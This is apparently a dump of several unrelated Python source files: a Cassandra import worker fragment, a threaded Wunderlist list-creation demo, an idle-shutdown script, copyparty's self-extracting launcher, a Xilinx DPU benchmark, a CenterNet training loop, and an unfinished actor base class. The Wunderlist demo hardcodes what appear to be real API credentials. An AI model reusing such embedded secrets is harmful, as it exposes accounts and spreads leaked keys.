statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
        it may not be possible; in this case it helps to increase the CHUNK SIZE, but only up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception as e:
errors[e.message if hasattr(e, 'message') else str(e)].append(row)
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.items():
if len(rows) > min_batch_size:
for i in range(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[tuple(filter_replicas(replicas[ring_pos])[:1])].extend(rows) # TODO: revisit tuple wrapper
# Now send the batches by replica
for replicas, rows in rows_by_replica.items():
for i in range(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
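        # Worked example of the batching rule above (hypothetical numbers): with min_batch_size=10,
        # max_batch_size=20 and 45 rows hashing to one ring position, that position yields three
        # batches of 20, 20 and 5 rows for its replicas; a position with only 3 rows instead falls
        # through to the by-replica path and is merged with other small groups that share the same
        # first live replica.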
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
err_msg = err.message if hasattr(err, 'message') else str(err)
self.outmsg.send(ImportTaskError(err.__class__.__name__, err_msg, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
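    # Example of the smoothing above: if the previous rate was 100 rows/s and the latest interval
    # measured 200 rows/s, the reported rate becomes (100 + 200) / 2 = 150 rows/s.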
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
multi_list_creator.py
|
import threading
import time
import Queue
import random
class MultiThread(object):
def __init__(self, function, argsVector, maxThreads=10, queue_results=False):
self._function = function
self._lock = threading.Lock( )
self._nextArgs = iter(argsVector).next
self._threadPool = [ threading.Thread(target=self._doSome)
for i in range(maxThreads) ]
if queue_results:
self._queue = Queue.Queue( )
else:
self._queue = None
def _doSome(self):
while True:
self._lock.acquire( )
try:
try:
args = self._nextArgs( )
except StopIteration:
break
finally:
self._lock.release( )
result = self._function(args)
if self._queue is not None:
self._queue.put((args, result))
def get(self, *a, **kw):
if self._queue is not None:
return self._queue.get(*a, **kw)
else:
raise ValueError, 'Not queueing results'
def start(self):
for thread in self._threadPool:
time.sleep(0) # necessary to give other threads a chance to run
thread.start()
def join(self, timeout=None):
for thread in self._threadPool:
thread.join(timeout)
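# Generic usage sketch (names below are illustrative, independent of the Wunderlist demo):
#   mt = MultiThread(lambda n: n * n, range(10), maxThreads=4, queue_results=True)
#   mt.start(); mt.join()
#   args, result = mt.get()   # call repeatedly to drain queued (args, result) pairs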
if __name__ == "__main__":
import wunderlist
wa = wunderlist.WunderlistAPI('94c0f1728a3cb4a066d21f1a63da3d4101fa7d11deb78ef800e4b16776e6', '171f61134bea341afeff')
def listcreate(n):
print 'N:', n
print wa.createlist('Maciek'+str(n))
def createtask(n):
print 'N:', n
print wa.createtask(247639416, 'Task'+str(n))
mt = MultiThread(createtask, range(1, 11))
mt.start( )
mt.join( )
print "Beautiful done."
|
shutdown_if_idle.py
|
# Copyright 2010 Alon Zakai ('kripken'). All rights reserved.
# This file is part of Syntensity/the Intensity Engine, an open source project. See COPYING.txt for licensing.
'''
Shuts down the server if no clients have been in it for a while.
Unlike shutdown_if_empty, we do not wait until someone enters - if someone
does not enter soon after we load, we will shut down. Another difference is
that we do not immediately shut down after someone leaves; we wait a short
while.
'''
import os, signal, time, threading
from intensity.base import *
from intensity.server.persistence import Clients
def halt_on_excess():
print '<<< Idle, shutting down >>>'
time.sleep(1.0) # Let print and message propagate
os.kill(os.getpid(), signal.SIGKILL)
def watcher():
consecutives = 0
while True:
time.sleep(60.0)
if Clients.count() > 0:
consecutives = 0
else:
print '<<< Warning: Idling (%d) >>>' % consecutives
consecutives += 1
if consecutives == 3:
halt_on_excess()
thread = threading.Thread(target=watcher)
thread.setDaemon(True)
thread.start()
|
sfx.py
|
#!/usr/bin/env python3
# coding: latin-1
from __future__ import print_function, unicode_literals
import re, os, sys, time, shutil, signal, threading, tarfile, hashlib, platform, tempfile, traceback
import subprocess as sp
"""
to edit this file, use HxD or "vim -b"
(there is compressed stuff at the end)
run me with any version of python, i will unpack and run copyparty
there's zero binaries! just plaintext python scripts all the way down
so you can easily unpack the archive and inspect it for shady stuff
the archive data is attached after the b"\n# eof\n" archive marker,
b"\n#n" decodes to b"\n"
b"\n#r" decodes to b"\r"
b"\n# " decodes to b""
"""
# set by make-sfx.sh
VER = None
SIZE = None
CKSUM = None
STAMP = None
PY2 = sys.version_info[0] == 2
WINDOWS = sys.platform in ["win32", "msys"]
sys.dont_write_bytecode = True
me = os.path.abspath(os.path.realpath(__file__))
def eprint(*a, **ka):
ka["file"] = sys.stderr
print(*a, **ka)
def msg(*a, **ka):
if a:
a = ["[SFX]", a[0]] + list(a[1:])
eprint(*a, **ka)
# skip 1
def testptn1():
"""test: creates a test-pattern for encode()"""
import struct
buf = b""
for c in range(256):
buf += struct.pack("B", c)
yield buf
def testptn2():
import struct
for a in range(256):
if a % 16 == 0:
msg(a)
for b in range(256):
buf = b""
for c in range(256):
buf += struct.pack("BBBB", a, b, c, b)
yield buf
def testptn3():
with open("C:/Users/ed/Downloads/python-3.8.1-amd64.exe", "rb", 512 * 1024) as f:
while True:
buf = f.read(512 * 1024)
if not buf:
break
yield buf
testptn = testptn2
def testchk(cdata):
"""test: verifies that `data` yields testptn"""
import struct
cbuf = b""
mbuf = b""
checked = 0
t0 = time.time()
mdata = testptn()
while True:
if not mbuf:
try:
mbuf += next(mdata)
except:
break
if not cbuf:
try:
cbuf += next(cdata)
except:
expect = mbuf[:8]
expect = "".join(
" {:02x}".format(x)
for x in struct.unpack("B" * len(expect), expect)
)
raise Exception(
"truncated at {}, expected{}".format(checked + len(cbuf), expect)
)
ncmp = min(len(cbuf), len(mbuf))
# msg("checking {:x}H bytes, {:x}H ok so far".format(ncmp, checked))
for n in range(ncmp):
checked += 1
if cbuf[n] != mbuf[n]:
expect = mbuf[n : n + 8]
expect = "".join(
" {:02x}".format(x)
for x in struct.unpack("B" * len(expect), expect)
)
cc = struct.unpack(b"B", cbuf[n : n + 1])[0]
raise Exception(
"byte {:x}H bad, got {:02x}, expected{}".format(checked, cc, expect)
)
cbuf = cbuf[ncmp:]
mbuf = mbuf[ncmp:]
td = time.time() - t0
txt = "all {}d bytes OK in {:.3f} sec, {:.3f} MB/s".format(
checked, td, (checked / (1024 * 1024.0)) / td
)
msg(txt)
def encode(data, size, cksum, ver, ts):
"""creates a new sfx; `data` should yield bufs to attach"""
nin = 0
nout = 0
skip = False
with open(me, "rb") as fi:
unpk = ""
src = fi.read().replace(b"\r", b"").rstrip(b"\n").decode("utf-8")
for ln in src.split("\n"):
if ln.endswith("# skip 0"):
skip = False
continue
if ln.endswith("# skip 1") or skip:
skip = True
continue
if ln.strip().startswith("# fmt: "):
continue
unpk += ln + "\n"
for k, v in [
["VER", '"' + ver + '"'],
["SIZE", size],
["CKSUM", '"' + cksum + '"'],
["STAMP", ts],
]:
v1 = "\n{} = None\n".format(k)
v2 = "\n{} = {}\n".format(k, v)
unpk = unpk.replace(v1, v2)
unpk = unpk.replace("\n ", "\n\t")
for _ in range(16):
unpk = unpk.replace("\t ", "\t\t")
with open("sfx.out", "wb") as f:
f.write(unpk.encode("utf-8") + b"\n\n# eof\n# ")
for buf in data:
ebuf = buf.replace(b"\n", b"\n#n").replace(b"\r", b"\n#r")
f.write(ebuf)
nin += len(buf)
nout += len(ebuf)
msg("wrote {:x}H bytes ({:x}H after encode)".format(nin, nout))
def makesfx(tar_src, ver, ts):
sz = os.path.getsize(tar_src)
cksum = hashfile(tar_src)
encode(yieldfile(tar_src), sz, cksum, ver, ts)
# skip 0
def u8(gen):
try:
for s in gen:
yield s.decode("utf-8", "ignore")
except:
yield s
for s in gen:
yield s
def yieldfile(fn):
with open(fn, "rb") as f:
for block in iter(lambda: f.read(64 * 1024), b""):
yield block
def hashfile(fn):
h = hashlib.md5()
for block in yieldfile(fn):
h.update(block)
return h.hexdigest()
def unpack():
"""unpacks the tar yielded by `data`"""
name = "pe-copyparty"
tag = "v" + str(STAMP)
withpid = "{}.{}".format(name, os.getpid())
top = tempfile.gettempdir()
opj = os.path.join
final = opj(top, name)
mine = opj(top, withpid)
tar = opj(mine, "tar")
try:
if tag in os.listdir(final):
msg("found early")
return final
except:
pass
sz = 0
os.mkdir(mine)
with open(tar, "wb") as f:
for buf in get_payload():
sz += len(buf)
f.write(buf)
ck = hashfile(tar)
if ck != CKSUM:
t = "\n\nexpected {} ({} byte)\nobtained {} ({} byte)\nsfx corrupt"
raise Exception(t.format(CKSUM, SIZE, ck, sz))
with tarfile.open(tar, "r:bz2") as tf:
tf.extractall(mine)
os.remove(tar)
with open(opj(mine, tag), "wb") as f:
f.write(b"h\n")
try:
if tag in os.listdir(final):
msg("found late")
return final
except:
pass
try:
if os.path.islink(final):
os.remove(final)
else:
shutil.rmtree(final)
except:
pass
for fn in u8(os.listdir(top)):
if fn.startswith(name) and fn != withpid:
try:
old = opj(top, fn)
if time.time() - os.path.getmtime(old) > 86400:
shutil.rmtree(old)
except:
pass
try:
os.symlink(mine, final)
except:
try:
os.rename(mine, final)
return final
except:
msg("reloc fail,", mine)
return mine
def get_payload():
"""yields the binary data attached to script"""
with open(me, "rb") as f:
ptn = b"\n# eof\n# "
buf = b""
for n in range(64):
buf += f.read(4096)
ofs = buf.find(ptn)
if ofs >= 0:
break
if ofs < 0:
raise Exception("could not find archive marker")
# start at final b"\n"
fpos = ofs + len(ptn) - 3
f.seek(fpos)
dpos = 0
rem = b""
while True:
rbuf = f.read(1024 * 32)
if rbuf:
buf = rem + rbuf
ofs = buf.rfind(b"\n")
if len(buf) <= 4:
rem = buf
continue
if ofs >= len(buf) - 4:
rem = buf[ofs:]
buf = buf[:ofs]
else:
rem = b"\n# "
else:
buf = rem
fpos += len(buf) + 1
for a, b in [[b"\n# ", b""], [b"\n#r", b"\r"], [b"\n#n", b"\n"]]:
buf = buf.replace(a, b)
dpos += len(buf) - 1
yield buf
if not rbuf:
break
def utime(top):
i = 0
files = [os.path.join(dp, p) for dp, dd, df in os.walk(top) for p in dd + df]
while WINDOWS:
t = int(time.time())
if i:
msg("utime {}, {}".format(i, t))
for f in files:
os.utime(f, (t, t))
i += 1
time.sleep(78123)
def confirm(rv):
msg()
msg("retcode", rv if rv else traceback.format_exc())
msg("*** hit enter to exit ***")
try:
raw_input() if PY2 else input()
except:
pass
sys.exit(rv or 1)
def run(tmp, j2):
msg("jinja2:", j2 or "bundled")
msg("sfxdir:", tmp)
msg()
# block systemd-tmpfiles-clean.timer
try:
import fcntl
fd = os.open(tmp, os.O_RDONLY)
fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except Exception as ex:
if not WINDOWS:
msg("\033[31mflock:{!r}\033[0m".format(ex))
t = threading.Thread(target=utime, args=(tmp,))
t.daemon = True
t.start()
ld = [tmp, os.path.join(tmp, "dep-j2")]
if j2:
del ld[-1]
if any([re.match(r"^-.*j[0-9]", x) for x in sys.argv]):
run_s(ld)
else:
run_i(ld)
def run_i(ld):
for x in ld:
sys.path.insert(0, x)
from copyparty.__main__ import main as p
p()
def run_s(ld):
# fmt: off
c = "import sys,runpy;" + "".join(['sys.path.insert(0,r"' + x + '");' for x in ld]) + 'runpy.run_module("copyparty",run_name="__main__")'
c = [str(x) for x in [sys.executable, "-c", c] + list(sys.argv[1:])]
# fmt: on
msg("\n", c, "\n")
p = sp.Popen(c)
def bye(*a):
p.send_signal(signal.SIGINT)
signal.signal(signal.SIGTERM, bye)
p.wait()
raise SystemExit(p.returncode)
def main():
sysver = str(sys.version).replace("\n", "\n" + " " * 18)
pktime = time.strftime("%Y-%m-%d, %H:%M:%S", time.gmtime(STAMP))
msg()
msg(" this is: copyparty", VER)
msg(" packed at:", pktime, "UTC,", STAMP)
msg("archive is:", me)
msg("python bin:", sys.executable)
msg("python ver:", platform.python_implementation(), sysver)
msg()
arg = ""
try:
arg = sys.argv[1]
except:
pass
# skip 1
if arg == "--sfx-testgen":
return encode(testptn(), 1, "x", "x", 1)
if arg == "--sfx-testchk":
return testchk(get_payload())
if arg == "--sfx-make":
tar, ver, ts = sys.argv[2:]
return makesfx(tar, ver, ts)
# skip 0
tmp = os.path.realpath(unpack())
try:
from jinja2 import __version__ as j2
except:
j2 = None
try:
run(tmp, j2)
except SystemExit as ex:
c = ex.code
if c not in [0, -15]:
confirm(ex.code)
except KeyboardInterrupt:
pass
except:
confirm(0)
if __name__ == "__main__":
main()
# skip 1
# python sfx.py --sfx-testgen && python test.py --sfx-testchk
# c:\Python27\python.exe sfx.py --sfx-testgen && c:\Python27\python.exe test.py --sfx-testchk
|
test_performance.py
|
# Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import *
from typing import List
import cv2
import numpy as np
import xir
import vart
import os
import math
import threading
import time
import sys
'''
Calculate softmax
data: data to be calculated
size: data size
return: softmax result
'''
def CPUCalcSoftmax(data,size):
sum=0.0
result = [0 for i in range(size)]
for i in range(size):
result[i] = math.exp(data[i])
sum +=result[i]
for i in range(size):
result[i] /=sum
return result
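# illustrative sanity check (not part of the benchmark):
#   CPUCalcSoftmax([1.0, 2.0], 2) ~= [0.2689, 0.7311], i.e. exp(data[i]) / sum(exp(data))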
def get_script_directory():
path = os.getcwd()
return path
global threadnum
#def runRfClassify(dpu,rfIn,rfClass,rfSnr,cnt):
def runRfClassify(dpu,rfIn, cnt):
"""get tensor"""
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
outputHeight = outputTensors[0].dims[1]
outputWidth = outputTensors[0].dims[2]
outputChannel = outputTensors[0].dims[3]
outputSize = outputHeight*outputWidth*outputChannel
softmax = np.empty(outputSize)
batchSize = inputTensors[0].dims[0]
n_of_samples = len(rfIn)
count = 0;
top1_count = 0
mods = [
'OOK', '4ASK', '8ASK', 'BPSK', 'QPSK', '8PSK',
'16PSK', '32PSK', '16APSK', '32APSK', '64APSK', '128APSK',
'16QAM', '32QAM', '64QAM', '128QAM', '256QAM', 'AM-SSB-WC',
'AM-SSB-SC','AM-DSB-WC', 'AM-DSB-SC', 'FM', 'GMSK', 'OQPSK']
while count < cnt:
runSize = batchSize
shapeIn = (runSize,) + tuple([inputTensors[0].dims[i] for i in range(inputTensors[0].ndim)][1:])
"""prepare batch input/output """
outputData = []
inputData = []
outputData.append(np.empty((runSize,outputHeight,outputWidth,outputChannel), dtype = np.float32, order = 'C'))
inputData.append(np.empty((shapeIn), dtype = np.float32, order = 'C'))
"""init input image to input buffer """
for j in range(runSize):
imageRun = inputData[0]
imageRun[j,...] = rfIn[(count+j)% n_of_samples].reshape(inputTensors[0].dims[1],inputTensors[0].dims[2],inputTensors[0].dims[3])
"""run with batch """
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
for j in range(len(outputData)):
outputData[j] = outputData[j].reshape(runSize, outputSize)
"""softmax calculate with batch """
"""Benchmark DPU FPS performance over Vitis AI APIs execute_async() and wait() """
"""Uncomment the following code snippet to include softmax calculation for model’s end-to-end FPS evaluation """
for j in range(runSize):
softmax = CPUCalcSoftmax(outputData[0][j], outputSize)
top1 = mods[np.argmax(softmax)]
count = count + runSize
"""
obtain DPU subgraph
"""
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (
root_subgraph is not None
), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def main(argv):
global threadnum
threadAll = []
threadnum = int(argv[1])
i = 0
g = xir.Graph.deserialize(argv[2])
subgraphs = get_child_subgraph_dpu(g)
cnt = int(argv[3])
assert len(subgraphs) == 1 # only one DPU kernel
all_dpu_runners = []
for i in range(int(threadnum)):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
"""input files"""
rfIn=np.load('./rf_input.npy')
rfIn = rfIn[0:cnt,:,:]
print("Number of RF Samples is ",(cnt*threadnum))
"""
The cnt variable is used to control the number of times a single-thread DPU runs.
Users can modify the value according to actual needs. It is not recommended to use
too small number when there are few input images, for example:
1. If users can only provide very few images, e.g. only 1 image, they should set
a relatively large number such as 360 to measure the average performance;
2. If users provide a huge dataset, e.g. 50000 images in the directory, they can
use the variable to control the test time, and no need to run the whole dataset.
"""
"""run with batch """
time_start = time.time()
for i in range(int(threadnum)):
t1 = threading.Thread(target=runRfClassify, args=(all_dpu_runners[i], rfIn, cnt))
threadAll.append(t1)
for x in threadAll:
x.start()
for x in threadAll:
x.join()
del all_dpu_runners
time_end = time.time()
timetotal = time_end - time_start
total_frames = cnt * int(threadnum)
fps = float(total_frames / timetotal)
print("FPS=%.2f, total RF frames = %.2f , time=%.6f seconds" %(fps,total_frames, timetotal))
if __name__ == "__main__":
if len(sys.argv) != 4:
print("usage : python3 test_performance.py <thread_number> <xmodel_file> <number of Rf Frames>")
else:
main(sys.argv)
|
train.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
from tensorboardX import SummaryWriter
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CenterNet")
parser.add_argument("cfg_file", help="config file", type=str)
parser.add_argument("--iter", dest="start_iter",
help="train at iteration i",
default=0, type=int)
parser.add_argument("--threads", dest="threads", default=4, type=int)
#args = parser.parse_args()
args, unparsed = parser.parse_known_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
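# Note on how pin_memory() is stopped (a sketch of the handshake used in train() below): the
# semaphore is acquired once before this thread starts, so acquire(blocking=False) fails and the
# loop keeps running; when training finishes, train() releases the semaphore and the thread
# returns the next time it reaches the check after pinning a batch.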
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
writer = SummaryWriter(max_queue=5)
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(system_configs.prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(system_configs.prefetch_size)
pinned_validation_queue = queue.Queue(5)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
if val_iter:
validation_tasks = init_parallel_jobs([validation_db], validation_queue, sample_data, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
print("building model...")
nnet = NetworkFactory(training_dbs[0])
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss, focal_loss, pull_loss, push_loss, regr_loss = nnet.train(**training)
#training_loss, focal_loss, pull_loss, push_loss, regr_loss, cls_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
print("focal loss at iteration {}: {}".format(iteration, focal_loss.item()))
print("pull loss at iteration {}: {}".format(iteration, pull_loss.item()))
print("push loss at iteration {}: {}".format(iteration, push_loss.item()))
print("regr loss at iteration {}: {}".format(iteration, regr_loss.item()))
#print("cls loss at iteration {}: {}\n".format(iteration, cls_loss.item()))
writer.add_scalar('training_loss', training_loss.item(), iteration)
writer.add_scalar('focal_loss', focal_loss.item(), iteration)
writer.add_scalar('pull_loss', pull_loss.item(), iteration)
writer.add_scalar('push_loss', push_loss.item(), iteration)
writer.add_scalar('regr_loss', regr_loss.item(), iteration)
del training_loss, focal_loss, pull_loss, push_loss, regr_loss#, cls_loss
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
writer.add_scalar('validation_loss', validation_loss.item(), iteration)
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
    if val_iter:
        for validation_task in validation_tasks:
            validation_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
__init__.py
|
import itertools
import uuid
from abc import ABC, abstractmethod
from multiprocessing import Process, Queue
from typing import (
Any, Hashable, MutableMapping, MutableSequence, NoReturn, Optional
)
from ..messages import Message, MessageKind
class BaseActor(ABC):
"""An actor as defined in the actor-based model of computing.
Attributes:
        name: A hashable value that identifies the actor.
inbox: A buffer that stores messages received from other actors.
outbox: A mapping from actor names to their inboxes.
"""
__slots__ = ('name', 'inbox', 'outbox')
def __init__(
self,
name: Optional[Hashable] = None,
inbox: Optional[Any] = None):
super().__init__()
self.name = self._else(name, str(uuid.uuid4().time_low))
self.inbox = self._else(inbox, Queue())
self.outbox = {}
@staticmethod
def _else(optional, otherwise):
return optional if optional is not None else otherwise
@abstractmethod
def on_next(self, msg: Any) -> NoReturn:
"""Processes a message."""
pass
@abstractmethod
def should_stop(self) -> bool:
"""Returns True if the actor should terminate."""
pass
def run(self) -> Any:
"""Initiates the actor."""
stop, receive, on_next = self.should_stop, self.receive, self.on_next
while not stop():
on_next(receive())
@abstractmethod
def send(self, *msgs: Any) -> NoReturn:
"""Sends messages to other actors."""
pass
def receive(self) -> Any:
"""Receives a message from another actor."""
return self.inbox.get(block=True)
def connect(self, *actors: 'BaseActor') -> NoReturn:
"""Enables this actor to send messages to other actors."""
self.outbox.update((a.name, a.inbox) for a in actors)
def disconnect(self, *actors: 'BaseActor') -> NoReturn:
"""Disables this actor from sending messages to other actors."""
pop = self.outbox.pop
for a in actors:
pop(a.name, None)
def __repr__(self):
return f'{self.__class__.__name__}(name={self.name})'
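# --- Illustrative sketch, not part of the original module ---
# A minimal concrete BaseActor, assuming plain strings are used as messages.
# The class below and its 'stop' sentinel are hypothetical, for illustration.
class _EchoActor(BaseActor):
    """Prints every message it receives and stops on the 'stop' sentinel."""
    __slots__ = ('_done',)
    def __init__(self, name: Optional[Hashable] = None):
        super().__init__(name)
        self._done = False
    def on_next(self, msg: Any) -> NoReturn:
        # Treat the literal string 'stop' as a shutdown request.
        if msg == 'stop':
            self._done = True
        else:
            print(f'{self.name} received: {msg}')
    def should_stop(self) -> bool:
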